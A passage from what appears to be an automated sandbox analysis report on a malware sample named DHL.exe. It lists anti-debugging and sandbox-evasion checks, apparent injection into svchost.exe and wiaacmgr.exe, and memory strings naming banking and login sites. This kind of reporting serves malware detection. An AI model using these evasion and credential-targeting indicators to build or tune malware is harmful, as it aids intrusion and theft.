                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\DHL.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99134
                Source: C:\Users\user\Desktop\DHL.exeAPI/Special instruction interceptor: Address: E1621C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\wiaacmgr.exeWindow / User API: threadDelayed 3423Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeWindow / User API: threadDelayed 6551Jump to behavior
                Source: C:\Users\user\Desktop\DHL.exeAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 7816Thread sleep count: 3423 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 7816Thread sleep time: -6846000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 7816Thread sleep count: 6551 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 7816Thread sleep time: -13102000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wiaacmgr.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A0DBBE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009DC2A2 FindFirstFileExW,0_2_009DC2A2
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A168EE FindFirstFileW,FindClose,0_2_00A168EE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00A1698F
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A0D076
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A0D3A9
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A19642
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1979D
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00A19B2B
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00A15C97
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286C9D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0286C9D0
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009A42DE
                Source: o3Z6161.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: discord.comVMware20,11696494690f
                Source: o3Z6161.5.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: eYHtcsfFquWF.exe, 00000006.00000002.2704062578.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: o3Z6161.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: o3Z6161.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: o3Z6161.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: o3Z6161.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: o3Z6161.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: o3Z6161.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: o3Z6161.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 0000000A.00000002.2016741991.0000014F78B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
                Source: o3Z6161.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: o3Z6161.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: o3Z6161.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: o3Z6161.5.drBinary or memory string: global block list test formVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: o3Z6161.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: o3Z6161.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: o3Z6161.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: o3Z6161.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: o3Z6161.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: o3Z6161.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417BA3 LdrLoadDll,2_2_00417BA3
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1EAA2 BlockInput,0_2_00A1EAA2
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009D2622
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009A42DE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C4CE8 mov eax, dword ptr fs:[00000030h]0_2_009C4CE8
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00E164E8 mov eax, dword ptr fs:[00000030h]0_2_00E164E8
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00E16488 mov eax, dword ptr fs:[00000030h]0_2_00E16488
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00E14E78 mov eax, dword ptr fs:[00000030h]0_2_00E14E78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
